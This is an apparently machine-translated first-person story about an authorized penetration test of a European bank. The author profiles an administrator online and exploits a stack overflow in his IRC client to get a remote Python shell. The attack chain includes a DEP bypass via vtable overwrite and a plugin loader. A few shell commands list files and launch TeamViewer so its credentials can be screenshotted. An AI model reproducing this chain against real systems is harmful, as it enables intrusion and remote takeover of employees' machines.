As always, without names and titles, and since I am additionally bound by the signature of non-disclosure, also with a slightly modified history (and omitting some details, for the publication of which I have not received permission).
The following is a real story of an employee’s computer penetration ... well, let's say some private bank. The events, about which your humble servant tells, happened in some European country not so long ago, even before DSGVO (GDPR, RGPD), but in the process of becoming one, on the threshold of, so to speak.
Actually, it all started with a security audit - ..., interviews, looking under the magnifying glass of everything and everyone, searching and working out potential loopholes and bottlenecks to climb (both there and from there), ..., and the actual debriefing. On which the customer received in the end a disappointing conclusion for him - "three things with a stretch".
Let us drop the words that had to be heard from the IT security blushes before our eyes, but the general lyrical message is as follows - I rush to unsubstantiated accusations, but they have everything on the lock, and the CSO has the key in my pocket under my heart.
Attempts to explain that the security system is built around a firewall + proxy + webwasher like content-filter & antivirus, without any at least developed hybrid IDS (HIDS + APIDS), honepotov, etc. etc., firstly, by definition, it is not safe, and secondly, I, as it were, have already shown several places where it is at least not comme il faut. Attempts to return to a constructive dialogue (actually back to the analysis) broke up against a three-story wall of insult, built by the whole department.
Having closed the meeting and dismissed the employees, the CSO, along with two important bosses, tried to honestly find out from me where the dog rummaged and understood how to live further as actually and specifically, in my humble opinion, it is necessary to do.
Since A glimpse of understanding was not observed in the future either, I was enthusiastically greeted by the offer to show in practice. After explaining what de now doesn’t work out well, settling the formalities (signing a few more papers, etc.) I got the go-ahead for "hacking".
The remark that working “blindly” is not very fond of (dreary, long and expensive, and pentesting, this is a matter of good luck) and please provide, therefore, some additional information (for example, some personal data of individual employees, such as developers and security guards ), I did not meet the counter understanding either.
Are you a hacker or not ?! (actually, no, I developed, and then - more than a hobby).
I will not dwell on the further discussion for a long time - I convinced as always the factor money and time (that is, the same money).
Those. as a result, we have some knowledge of the company's security structure (obtained as a result of a preliminary audit), as well as the full name and brief biography of 4 administrators and 3 developers.
Why are admins actually developed? After all, one could ask for “girls accountants”, send them some “cat” with some much less safe animal attached to it (or turn something like that from the social engineering field) . But…
However, many companies, as a rule, do not like very much when they will be told about this at the PoC presentation, i.e. A “hacking system” based on intrigues from the field of social engineering is at least not welcome, however ingenious it would be.
Returning to techies, firstly they are not less “social” (which does not mean at all that they will launch some kind of “cat”, but the fact itself is important), and secondly they usually have a more “developed” computer in functional terms ( what is there only you will not meet). And what is more interesting, moreover, they often have some “privileges” in contrast to the same girl accountant, i.e. can either be less infringed upon in terms of security and system constraints (such as policies and co - you should, for example, somehow run the newly compiled exe-schnick) and / or can themselves climb through the "wall" built by safes (for example, after forwarding the tunnel through a proxy), etc. etc.
Again, to crawl through the protection, using the computer programmer or admin, it sounds completely different than, for example, "forcing" to run the accountant's Trojan.
Those. the initial ones are received, the tasks are voiced - let's go ...
The first step is to collect information about "customers" - who, what, where, when.
I won’t be distracted here, the article isn’t entirely about it, so I’ll just say - I stopped at a rather social guy, with face-ups and to, including my own youtube channel (YouTube, Vasya!), Several open-source projects (both in the group and in and own) and simply giant contribution activity (one wonders if he works at the main place) .
To find out hu-i-hu today is generally not a problem at all (somewhere using the real name in a place with a nickname, somewhere it’s the IP address of the proxy from the company and the picture has taken shape), but no one really hides.
I was forced to slow down on it, including my natural sense the fact that in one of the community our hero was engaged in more or less active support in the chat, and using an IRC client, which provided user-info in addition to IP, where his legs grow from, also the name and version of himself, and well-known bugs / holes and by default was wrapped with plug-ins for good reason.
Well, as usual, one evening the family fell asleep, one dregs in the box, ours again lose :) I found a familiar nickname in that chat, as an active user with a connection longer than 12 hours (judging by the log with intermediate disconnections / reconnections, for a corporate proxy is such a thing, but more than half a day after the first connection) from the IP address I need those. with a "login" of the form max.mustermann@proxyext.our-company.example.com .
That is, either our client has a day - 24 hours, or more likely (because 2 hours have passed since his last message), he simply did not turn off the work computer and left the IRC client active.
Or maybe he put the computer to sleep, but (here again the error of security guides or administrators) happens that the latter wakes up by itself, for example, to roll up updates for Windows (and after a 4-hour pause to reboot) or just stupidly saying a wake-on-lan signal .. .
Anyway, I had a certain amount of time to pat the computer, or rather the IRC client of our “victim”.
Not finding a single known hole in this particular (by the way relevant at that time) version of the IRC client, armed with ida, ollydbg, etc. and looking at the sources (quiet horror, Vasya!), he began to look for some kind of vulnerability, giving at least the ability to execute something there, with an eye on how to control the IRC client remotely (and we remember about the plugins).
And it was found, even relatively quickly!
To intercept control allowed the presence of an insecure sprintf call to the buffer from the stack with %s inside from a poorly filtered foreign-input (together with the encoding injection), which allows to write an exploit code loader to the stack (thanks to the client developers for Microsoft for the lowland stack and lucky coincidence).
Although I still had to suffer - because we have DEP, it is impossible to execute directly from the stack, you need to write a copy of the “program code” for execution, find a memcpy call with ret at the end to copy to the right place (rewrite a little used class), redirect the output from several procedures to the right place, overwrite several VTABLE values so that, upon calling the next virtual method, generate an event that causes some python code as a plug-in (and change this python code to your own, as a loader from broken messages, to assemble a ready e ployt-toolkit).
Oh yeah, I also needed to collect a plugin (again, thanks to the client’s developers for such generous functionality), as a proxy, changing messages on the fly (adding a wrapper to initiate an injection, breaking its encoding, inserting incomplete surrogates in the right place, and .e.), encode initial injection-message loader, etc.
In addition, I had to collect a small python script in the form of a new client plug-in for the target system as a console emulator (accepting my messages in its stdin, and sending stdout + stderr with a private message back to my nickname).
Having collected all this on my knee, I launched that IRC client in order to try myself as a victim, i.e. see how it will be in full, finished form.
And having sent through my plugin from another session from the second running version of the application, several private injection messages, I was delighted to see the usual python greeting greeting >>> (which I stuck in the emulator, for clarity - the same python).
Satisfied as an elephant (noting that the attacked application did not fall), I saw what was happening in its message output window - it was full of various non-ascii characters, the most noticeable of which was
I looked into the code, and there they were waiting for the NTS line at the output, I decided not to bother much and stupidly rewrite the first byte of the message after loading with zero (with the hope that the message will be displayed on the screen a little later).
Repeating the whole process, and waiting for the desired >>> looked again at another window and did not find there is nothing superfluous in the chat (I'm still a genius) decided to continue the test.
The message from glob import glob as ls; ls('*') from glob import glob as ls; ls('*') and I happily saw the answer from the list of folders and files contained in the application folder.
True, I saw the same message in the window of the attacking client as sent to my nickname. I also had to put 0-byte (NTS) at the beginning of the line after sending it to me.
Having finished with the preparatory phase, he noted that our experimental companion was still in the chat (without messages, Vasya!), Had already prepared an exploit for our candidate.
Go...
The injection messages went away ... And after a few long seconds (apparently the disk was asleep or the proxy was stupid), I again saw the inviting >>> .
As I jumped around the room, I still will not tell here (this sight is not for the faint-hearted, because as a result of the uncontrollable process of manifestation of joy, I still zando legs with my little finger on the leg of the chair).
Wincing from the pain and immediately thinking, “what if something is not clearly visible in his recoil window, all of a sudden I messed up somewhere and the application will fall as a result in time”, remembered about a possible forced restart after update (if the computer woke up from that and already rolled up update), in a cold sweat (looking at the swollen little finger and relieving the trembling in my hands) I sped up.
The first step is to check just in case if we are there at all.
>>> import os; os.environ['userdomain']
and the answer is:
'OUR-COMPANY' >>>
All right, hands are untied ... Let's go.
Having checked with a small script that logonui is locked, having calmed down a bit, I decided to see what was on the computer at all:
>>> from glob import glob as ls; ls(r'C:\Program Files\*')
but in response, in disbelief of his luck, among the many interesting things I saw the following:
[...,'C:\\Program Files\\TeamViewer',...] >>>
Those. You no longer need to make extra gestures - you do not need to download anything, compile and look for a folder where you can write it all without violating any policies.
And in the meantime flew:
>>> import subprocess; subprocess.call([r'C:\Program Files\TeamViewer\TeamViewer.exe'])
Well, after returning the answer:
0 >>>
After waiting a little for TeamViewer to get through the proxy and the server gave him an ID (with a password), I ran a script there that looked for the TeamViewer window, removed a screenshot from it and sent it back to me as a base64 line, in which I deployed it back to bitmap, I am pleased to find both the ID and the password for the connection.
...
The next morning, I was already called by the surprised CSO , who had received a letter from me first (but for some reason came from his employee’s internal Exchange account), and then a frightened call from the same employee with the words “Chief, usyo was gone - we were broken”, who discovered an open window in the morning Word'a with a large text inside "Two for you on security. You have been hacked!", Date, signature.
After that, communication with the guards was already more fruitful, without splashing of saliva, tearing shirts and screams. Having learned from bitter experience ( for example, as described in this article ), I tried as best I could, trying to postpone the analysis of the actual hack later (because I first wanted to receive a cash order for a new security concept), but after lengthy persuasion, hints for long-term cooperation, etc. p., as well as promises from their side "not to touch" the employee who had failed, (a colleague after all), they had to lay out almost all the main points.
I then received a fully negotiated bounty for hacking (as well as the cost of a preliminary audit), but then the office behaved ... say, not exactly sporting. To continue the concert, they hired a prominent and well-known auditing firm, which in principle refused to work with external in my face.
Oh well, as they say in Germany, "Man sieht sich immer zweimal im Leben", which means "Be sure to meet again."